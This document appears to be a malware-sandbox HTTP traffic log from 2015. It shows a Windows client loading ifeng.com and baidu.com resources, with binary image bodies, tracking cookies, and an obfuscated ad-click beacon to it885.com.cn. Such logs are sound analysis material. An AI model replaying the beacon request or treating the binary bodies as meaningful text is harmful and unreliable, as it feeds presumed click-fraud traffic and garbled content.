HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:35 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1014.v0-mow ( h0-s1083.v0-mow), ht h0-s1083.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Fri, 13 Nov 2015 08:29:53 GMT

Age: 13326042

Content-Length: 2554

Content-Type: image/gif

Last-Modified: Thu, 05 Dec 2013 05:48:21 GMT

Connection: keep-alive
GIF89a.......n......([email protected].........
......e...~.......~..............q...S\..&>`m......................
....................................................................!.
.XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c
011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf=
"hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description 
rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef
="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns
.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:323D03B4FE57E31
191C0D8A7DFD06564" xmpMM:DocumentID="xmp.did:69D3F5335CBC11E3B8CCD83F1
40B66B2" xmpMM:InstanceID="xmp.iid:69D3F5325CBC11E3B8CCD83F140B66B2" x
mp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFr
om stRef:instanceID="xmp.iid:333D03B4FE57E31191C0D8A7DFD06564" stRef:d
ocumentID="xmp.did:323D03B4FE57E31191C0D8A7DFD06564"/> </rdf:Des
cription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?
>..................................................................
................................................................~}|{zy
xwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9
876543210/.-, *)('&%$#"! .................................!.......,...
........@.P........dH.....HZ...S.M....xL...Q.z.f..............z....ei 
....}".j.Q.L|C..[P.L.......PK...ml.L... .Qr \K.p.c...d...........Q<<< skipped >>>

GET /e01ed39fc2da5d4a/2014/0317/sharebg.gif HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y2.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:37 GMT

Server: PWS/8.1.20.9

X-Px: ht h0-s1014.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Tue, 12 Jan 2016 00:27:51 GMT

Age: 8170966

Content-Length: 7253

Content-Type: image/gif

Last-Modified: Tue, 18 Mar 2014 08:23:44 GMT

Connection: keep-alive
GIF89a$.r....].....K....ub.......*..T..........PS.....*.............[^
......\..=.....C.......2....59.....K..F4........7- ...:...{}..#L......
....J......u..j.....l.......k......d.....s..V.........PR.bc...........
...........%'..\..!.........RIG.....w.........y.....S.....[.....i.....
...d..V................{L.........qr.....................U..s.......C.
.....\TR..8.........#....b.VX.59......G...IL.....aA...................
......SM.............><....C}..x..F.......}.... $..v..........|}
............|..A.....A../.....7.......A.......................E.......
...... $......................NP.AB.57...g`]..... ..........JM.......0
4..f....~}...{...._........9...................mo.....B....>@......
..p......tmk.......................N.wx.................h....np.......
....................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begi
n="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adob
e:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:
56:27        "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22
-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="htt
p://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0
/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:Or
iginalDocumentID="xmp.did:EA8EE28C0762E311AB3E9E2DFBFA4DE3" xmpMM:Docu
mentID="xmp.did:1F92F4CAAE7411E38A4CE4B2A51A9265" xmpMM:InstanceID="xm
p.iid:1F92F4C9AE7411E38A4CE4B2A51A9265" xmp:CreatorTool="Adobe Photosh
op CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.<<< skipped >>>

GET /ps_default.gif?_t=1429193428632 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: i7.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/gif

ETag: "4009727547"

Accept-Ranges: bytes

Last-Modified: Mon, 28 Jul 2014 10:29:03 GMT

Content-Length: 43

Date: Thu, 16 Apr 2015 14:10:26 GMT

Server: lighttpd

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Access-Con
trol-Allow-Origin: *..Content-Type: image/gif..ETag: "4009727547"..Acc
ept-Ranges: bytes..Last-Modified: Mon, 28 Jul 2014 10:29:03 GMT..Conte
nt-Length: 43..Date: Thu, 16 Apr 2015 14:10:26 GMT..Server: lighttpd..
GIF89a.............!.......,...........D..;..

GET /su?wd=&zxmode=1&json=1&p=3&sid=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498&cb=jQuery11020564010697925782_1429193425102&_=1429193425103 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: suggestion.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:22 GMT

Server: suggestion.baidu.zbb.df

Content-Length: 85

Content-Type: text/javascript; charset=gbk

Cache-Control: private

Connection: Keep-Alive
jQuery11020564010697925782_1429193425102({"q":"","p":false,"bs":"","s"
:[],"zzx":[]});HTTP/1.1 200 OK..Date: Thu, 16 Apr 2015 14:10:22 GMT..S
erver: suggestion.baidu.zbb.df..Content-Length: 85..Content-Type: text
/javascript; charset=gbk..Cache-Control: private..Connection: Keep-Ali
ve..jQuery11020564010697925782_1429193425102({"q":"","p":false,"bs":""
,"s":[],"zzx":[]});....


GET /su?wd=Ã„&zxmode=1&json=1&p=3&sid=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498&cb=jQuery11020564010697925782_1429193425102&_=1429193425104 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: suggestion.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:26 GMT

Server: suggestion.baidu.zbb.df

Content-Length: 85

Content-Type: text/javascript; charset=gbk

Cache-Control: private

Connection: Keep-Alive
jQuery11020564010697925782_1429193425102({"q":"","p":false,"bs":"","s"
:[],"zzx":[]});HTTP/1.1 200 OK..Date: Thu, 16 Apr 2015 14:10:26 GMT..S
erver: suggestion.baidu.zbb.df..Content-Length: 85..Content-Type: text
/javascript; charset=gbk..Cache-Control: private..Connection: Keep-Ali
ve..jQuery11020564010697925782_1429193425102({"q":"","p":false,"bs":""
,"s":[],"zzx":[]});..

GET /cmpp/2014/12/24/07/1d2544d2-0a9e-4b12-87b8-30facc8dd482.jpg HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y3.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:37 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1030.v0-mow ( h0-s1009.v0-mow), ms h0-s1009.v0-mow ( h0-s97.p13-pek), ht-d h0-s97.p13-pek.cdngp.net

Cache-Control: max-age=31536000

Expires: Tue, 15 Mar 2016 23:22:54 GMT

Age: 2645263

Accept-Ranges: bytes

Content-Length: 106193

Content-Type: image/jpeg

Last-Modified: Tue, 23 Dec 2014 23:13:24 GMT

Connection: keep-alive
......JFIF.....H.H......Photoshop 3.0.8BIM....................48361963
3..(..MR & PR..P..Andrejs Zemdega..n..Getty Images/Vetta..s..Vetta..x.
&Couple in New York City's Central park.8BIM........hXXp://VVV.gettyim
ages.com...C..........................................................
..........C...........................................................
............R...............................................L.........
.................!..1."A.Q.2a.#Bq...$R.3...b...Lr....DS..'56cs......
.............................C.......................!..1A.."Qaq.....2
....#B.3R..b..$Cr...4..%c............?..K.....:I..Yg.q.e..c....VL8.Q .
..Y.oP..-..............X....x...k{.....X.P.f.LU.....<..-a..P.H.ZQ..
..Kh.T.}..%-[).w.[.\|).d.}..4....A.V....4.wh)...U.....)K..V...JS.q^...
...SD*.q......6.C~.;b......pw........d...{|.0......w...:..^....<..=
*...Q.......qd3U...W)..._}5..t..8 ......k.$HX........N......!.}.:.%p..
.2.AO...EKI...Q...<-...[..ZS.IN9.>t........68.-{*..YJ....1....c8
Q......E..F....JYpy...F...G<.....>...m|..a-.*Q.?..N......i[..K..
uR..mM.R...A?.N.....=%4........&...r@ q...R.....^S..U.=..Dg.-.6.......
c.......0.e/.....w.2...-D...?.V.....5[...0....beVUJ.%$.....Q.)j.p...db
K..9.w..G..>CE.,.(.8...!Z*w..d..}....j......Kk....8....,.IuU\...o*.
_u. W......i...Q8C....=V..T.Je-!.!.$.J.......6Sk...).%.#....gvlW.Z.c..
..5E5)3TR\.......Q.....t4....[q.6....0.S...W':.>.'7...,06$.."..H.I.
4.Hn8!....44.............*...h..mN..8.>5......yH...m..m...1.C..O...
".... %2...`.....:...{pr5.u;['L*..8...4..p.....=.....c..g......A..<<< skipped >>>

GET /it/u=194142598,852924299&fm=58 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t11.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/jpeg

Expires: Sun, 17 May 2015 00:10:55 GMT

Cache-Control: max-age=2628000

Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT

ETag: 17d66862ff1498efe52f3a128c2d78f8

Content-Length: 1697

Date: Thu, 16 Apr 2015 14:10:55 GMT

Server: lighttpd
......JFIF.............C..............................................
!........."$".$.......C...............................................
........................K.K.."......................................9.
.......................!."1A.Qa.2q..#R.....$Br.3S.....................
.....................................!1Q................?.......Y.(...
.st..Z....EiSS. ,....B.....h..I.`..1^.gfV.....m..y-.7\....3...g....;:.
y..0......}$.v*.|.[...?f...q.E.......q4).E..[QUhFH....L....g..T...e cV
.$.......hN....jU.n..c...Eq.j..h.C.X).w......'.YK.....2g..b.f..L.....d
|(..N).r.,...hW*ZB..9...2[\.....v..&.t.|....N.I..N.yw;....K.C.r.[=.s..
;..U.4..SG#q%G.:.Y.v.rv.?.k..^..F...4```m...?......;.=......<.0....
S...G.Ro."@.5.....q.....W/....Oe..F...3..3......Gv>..Ye..0...n.k>
;4XNGt..$.d~PD.H=.1...z..h........q.v...G.6..[......Yd\c..Z_.....OU3&g
t;T..1.5$.m..."...fH........j]..p..Y......U.V.....o.4...^.........7.i.
.Kmjm....v."c...:.hWV..t.......>lz...Z.!U. ..1.....B0WB...S...[....
...F..2.>..*m...)P....] Rn....9...a...Z..!s......,...o.T=>_.U%.S
.F..S.R...>b.\^x.F..$,.r[.zm..<....6I!...D..\....:...:..o...e.NZ
-.7..O..1.1..w6..]i.....}.j..U..5..&...C.p..>..@...~.G........\;f.E
..L....g..h..8.....i...........?:b..;..$.p3.J...9.cQ8h.....)...>.h'
:.H:...(..i6^cR.R..$...u....[=A.. ....v..........*.. z.O./.....P...O-.
..)P..A"...nI>.........K.v<.I#.y.A....]n.............0q.Sij.q..]
:.|........)....:.c .9..i......y?.X6.rV..w.....6:t=3.2~T... .......Yp&
gt;.5.....1x..Kki3(.#R%V,.9b...m.......aMz$*..}....^..O..zy._.....<<< skipped >>>

GET /it/u=602776483,2047304585&fm=58 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t11.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/jpeg

Expires: Sun, 17 May 2015 00:10:55 GMT

Cache-Control: max-age=2628000

Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT

ETag: 790fbad8e667f4eea66df1e3d976786f

Content-Length: 2308

Date: Thu, 16 Apr 2015 14:10:55 GMT

Server: lighttpd
......JFIF.............C..............................................
!........."$".$.......C...............................................
........................K.K.."........................................
?.........................!.1AQ..."2aq..#$...BRb......345CDr..........
.......................&........................!1..QR2.3ABq..........
..?.|o.x.............w.....~.n. .....QE~`.\p..5].?.Y.U?.M.._.o........
..x...Tf.l1..k.U,{n~.[..lE...(..*&.^UY..$Me.......l/S.<1.....y^..Gk
|R.O...../.....=`=......0...L.-..(.a.]$. ^.._D..Q...RD.r....6T........
%.......c...).[S"..... if...X6...5...Y..n/.........?...N.?....3..laB..
/E-?.UF..b....1...K...Y.7...:..E.....[..l........uQ.W..Z.8.EJ..d..wn..
.._X.....z..F..SM..M.:r....)...am..O.QuM.. .pG.......r......C!J*.....,
.,-..........m*r:..X..}.E..KS.Z..(..#...[P......m.>Wd.r.Y.c..YB....
:l..p..4......U.....N..9..ez...T..X.g.6=w.7....vK.J.%<...2.o.... I 
....MT4.........2..=b9..?..X...5k.*fi....../,r].?.A..c...E...u...A9Y.|
.e:.u...k......5D.H..Y._0.F.,E..=/.....fWIV3Yx.. #.R..UL`HWK..t.....=.
..)%;].E..,D.%B.^.."4&....j.>...-)xm&.mpw....~c.$..0......j...j.F..
t..al..QfC...7"z[.0>.S3.1k..........a~.<.*|.t..:u.L..T.........1
R.U$3......&.!..?7..#... [email protected]......#...^}...w..........F..o.c.
..Nzj.G5..K.6X...,B..l,I...\z..<.c.4....H....^.......<...3x..(hj
'.b.%...Xi]Z.v....X.[.*I a.2."..p*..mV.3.0'..........Z....1...=.g}...~
 ..$...F.6...`.D\.AP...YZ..U;f...I.{K.......P....!...C..fi.Tf..SS^.p.U
...... .y..tz...L.*C....i.`@..I....O.0|..2...0.-.....qq....f......<<< skipped >>>

GET /ifeng/sources/region_v1.js HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: h2.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Expires: Thu, 16 Apr 2015 14:24:55 GMT

Date: Thu, 16 Apr 2015 13:24:55 GMT

Server: nginx/1.2.3

Content-Type: application/x-javascript

Transfer-Encoding: chunked

Last-Modified: Mon, 27 Oct 2014 03:10:19 GMT

Cache-Control: max-age=3600

Content-Encoding: gzip

Age: 1

X-Via: 1.1 hnlywt60:8105 (Cdn Cache Server V2.0), 1.1 kf48:9 (Cdn Cache Server V2.0)

Connection: keep-alive
3ad.............V.N.@.}N.........IQ..LUQTE.....P.........p ...zw}KB.~ 
.3g.gfg...........K...h".<.iC...H.4f...m.....sC84..U..j....O..P"/).
..h...S....Z..J...6F.i.'$.R...$.....G9.;iz..._d.R.Ghj.F.9..G../....3..
mHh.)..:C.`.?[..3.\.K....Vs.S.......KS-.{..`....6Uh.Z...O`.P....N.R.o.
.i..F.qL.Fn.8.&..s...>D....v........[.B$.. Tb.U......9.@....|......
.0U..e..2...\..._...F.651\.v8(#U.[.GH..Y........X..W.9...)8...M.NUR.0.
~.{C.(...JH.2...??.2....Xr.\..8C.^.?&.[...f.Ht..]7..on.....!l.......E&
lt;]G......G......98.6.=..9....c...j.....9Q..b.6.Y....@W.].b[.b."....~
......g....6...U>..*..pt....9.Ox..U.S..A..........h...h.../..#.Z.?#
B.p,.....;.v.....V.4..<.n...]..b...:../A#...T..|.....5..6.oI3p.."..
......8..ux..vY.E.ds=hZ-u..*.t..(gc...kK....l....-)\. ..:.b...K.!...0.
z;j*_...Y.....*...U1/[email protected]...
E..vg.m^......E>.k.SZ.:..;..f....~.....-.q......;i.Hz'{W.....: x.:.
Rf.{=M..b.S.=l.Cv>..kNdx%..E.6f.p...IO...v26._`.Tz......0..HTTP/1.1
 200 OK..Expires: Thu, 16 Apr 2015 14:24:55 GMT..Date: Thu, 16 Apr 201
5 13:24:55 GMT..Server: nginx/1.2.3..Content-Type: application/x-javas
cript..Transfer-Encoding: chunked..Last-Modified: Mon, 27 Oct 2014 03:
10:19 GMT..Cache-Control: max-age=3600..Content-Encoding: gzip..Age: 1
..X-Via: 1.1 hnlywt60:8105 (Cdn Cache Server V2.0), 1.1 kf48:9 (Cdn Ca
che Server V2.0)..Connection: keep-alive..3ad.............V.N.@.}N....
.....IQ..LUQTE.....P.........p ...zw}KB.~ .3g.gfg...........K...h".<
;.iC...H.4f...m.....sC84..U..j....O..P"/)...h...S....Z..J...6F.i.'<<< skipped >>>

GET /0f56ee67a4c375c2/2013/1106/indeccode.png HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: h2.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Expires: Thu, 16 Apr 2015 14:29:23 GMT

Date: Thu, 16 Apr 2015 13:29:23 GMT

Server: nginx/1.2.3

Content-Type: image/png

Content-Length: 961

Last-Modified: Wed, 06 Nov 2013 07:42:21 GMT

Cache-Control: max-age=3600

Accept-Ranges: bytes

Age: 1

X-Via: 1.1 hnlywt61:8104 (Cdn Cache Server V2.0), 1.1 kf50:4 (Cdn Cache Server V2.0)

Connection: keep-alive
.PNG........IHDR....................6PLTE.............VY.."..........r
u....dg.9>.... 0....GK...k......FIDATx......0...........I...Lj.....
....|.ma.....@ ...qR.........\p..n-./ ........Gq%..u...Z.....p_.......
.|....~;w....R.......c..........\p....RR.zp..g..g....Xo1.......\p..$W.
B...h......s.d.._........:c._......N^.x8r9$...c;...........c....k5Q...
..6......2w.M.r..#v...t.....V......LK.c[$wlXk)v.B71..q..H..n......N...
.. U..jn...._}..%_ w..-..W?=py....#....e....Z........(..-..3.k.....u..
\h..M.. n.. W..C1c'..z^n6L49{.i...Z..s3........_...... .....Z .[..=...
.;..m.....e......,2..%;...N.w..\.U......s......{.wX..hH?Cly......*....
l..O3.....KR=E_.5..mXjn...i.m.\..i.tU..nc....u..6S..C....8..._.m...5.P
...........p.r..n....'(...b..[..W.......w....I<.q...(..}....9.c.!Eq
\...WE.'_=.(..I..\).t.k.$.[....N.....k......9..\p.-..5..|1...<....'
.'u.......<...n.\.c......[...\p.....3.|....\p.. .. 4tp.....y.......
...r.).G...........|~`.a?..........@ ......N.9.........IEND.B`.HTTP/1.
1 200 OK..Expires: Thu, 16 Apr 2015 14:29:23 GMT..Date: Thu, 16 Apr 20
15 13:29:23 GMT..Server: nginx/1.2.3..Content-Type: image/png..Content
-Length: 961..Last-Modified: Wed, 06 Nov 2013 07:42:21 GMT..Cache-Cont
rol: max-age=3600..Accept-Ranges: bytes..Age: 1..X-Via: 1.1 hnlywt61:8
104 (Cdn Cache Server V2.0), 1.1 kf50:4 (Cdn Cache Server V2.0)..Conne
ction: keep-alive...PNG........IHDR....................6PLTE..........
...VY.."..........ru....dg.9>.... 0....GK...k......FIDATx......0...
........I...Lj.........|.ma.....@ ...qR.........\p..n-./ ........G<<< skipped >>>

GET /img/pc.gif?_t=842 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: b1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:26 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

Last-Modified: Mon, 28 Jul 2014 03:15:13 GMT

Expires: Thu, 16 Apr 2015 14:13:19 GMT

Age: 427

Cache-Control: max-age=600

Accept-Ranges: bytes

Ohc-Content-Crc: 85354799

Server: ld02-sys-jorcol01.ld02.baidu.com

Timing-Allow-Origin: hXXp://VVV.baidu.com

CDN-AGE: 1

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Date: Thu,
 16 Apr 2015 14:10:26 GMT..Content-Type: image/gif..Content-Length: 43
..Connection: keep-alive..Last-Modified: Mon, 28 Jul 2014 03:15:13 GMT
..Expires: Thu, 16 Apr 2015 14:13:19 GMT..Age: 427..Cache-Control: max
-age=600..Accept-Ranges: bytes..Ohc-Content-Crc: 85354799..Server: ld0
2-sys-jorcol01.ld02.baidu.com..Timing-Allow-Origin: hXXp://VVV.baidu.c
om..CDN-AGE: 1..GIF89a.............!.......,...........D..;..

GET /ps_default.gif?_t=1429193428648 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: i9.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/gif

ETag: "3950885796"

Accept-Ranges: bytes

Last-Modified: Mon, 28 Jul 2014 10:27:38 GMT

Content-Length: 43

Date: Thu, 16 Apr 2015 14:10:26 GMT

Server: lighttpd

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Access-Con
trol-Allow-Origin: *..Content-Type: image/gif..ETag: "3950885796"..Acc
ept-Ranges: bytes..Last-Modified: Mon, 28 Jul 2014 10:27:38 GMT..Conte
nt-Length: 43..Date: Thu, 16 Apr 2015 14:10:26 GMT..Server: lighttpd..
GIF89a.............!.......,...........D..;..

GET /web/click_log2.asp?ad_url=47556mqqu?**rrr+lq==0+fjh+fk*r`g*w`b*lfdvqZ470Z4+dvu&cr=yes HTTP/1.1

Accept: */*

Referer:

Accept-Language: zh-cn

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)

Host: VVV.it885.com.cn

Connection: Keep-Alive

Cookie:


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 1

Content-Type: text/html

Server: Microsoft-IIS/7.5

Set-Cookie: ASPSESSIONIDSARCDQTQ=EFDJJLFDDHIICDCDNGAGCINL; path=/

X-Powered-By: ASP.NET

Date: Thu, 16 Apr 2015 14:10:34 GMT

0HTTP/1.1 200 OK..Cache-Control: private..Content-Length: 1..Content-T
ype: text/html..Server: Microsoft-IIS/7.5..Set-Cookie: ASPSESSIONIDSAR
CDQTQ=EFDJJLFDDHIICDCDNGAGCINL; path=/..X-Powered-By: ASP.NET..Date: T
hu, 16 Apr 2015 14:10:34 GMT..0..

GET /9.gif?abc=1&rnd=132663274 HTTP/1.1

Accept: */*

Referer: hXXp://1.rwdns.com/zztj/yeshe.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cnzz.mmstat.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: Tengine

Date: Thu, 16 Apr 2015 14:10:26 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=0rC2DWbMLVwCASU5EL1qq92F; expires=Sun, 13-Apr-25 14:10:26 GMT; path=/; domain=.mmstat.com

Set-Cookie: sca=6ad2cb4a; path=/; domain=.cnzz.mmstat.com

Set-Cookie: atpsida=39c417cd7e058e8e1d6d038c_1429193426; expires=Sun, 13-Apr-25 14:10:26 GMT; path=/; domain=.cnzz.mmstat.com

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=0rC2DWbMLVwCASU5EL1qq92F

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server:
 Tengine..Date: Thu, 16 Apr 2015 14:10:26 GMT..Content-Type: image/gif
..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CUR
a ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=0rC2DWbMLV
wCASU5EL1qq92F; expires=Sun, 13-Apr-25 14:10:26 GMT; path=/; domain=.m
mstat.com..Set-Cookie: sca=6ad2cb4a; path=/; domain=.cnzz.mmstat.com..
Set-Cookie: atpsida=39c417cd7e058e8e1d6d038c_1429193426; expires=Sun, 
13-Apr-25 14:10:26 GMT; path=/; domain=.cnzz.mmstat.com..Location: htt
p://pcookie.cnzz.com/app.gif?&cna=0rC2DWbMLVwCASU5EL1qq92F..Expires: T
hu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cach
e..GIF89a.............!.......,...........L..;..

GET /it/u=3537516083,882981865&fm=58 HTTP/1.1

Accept: */*

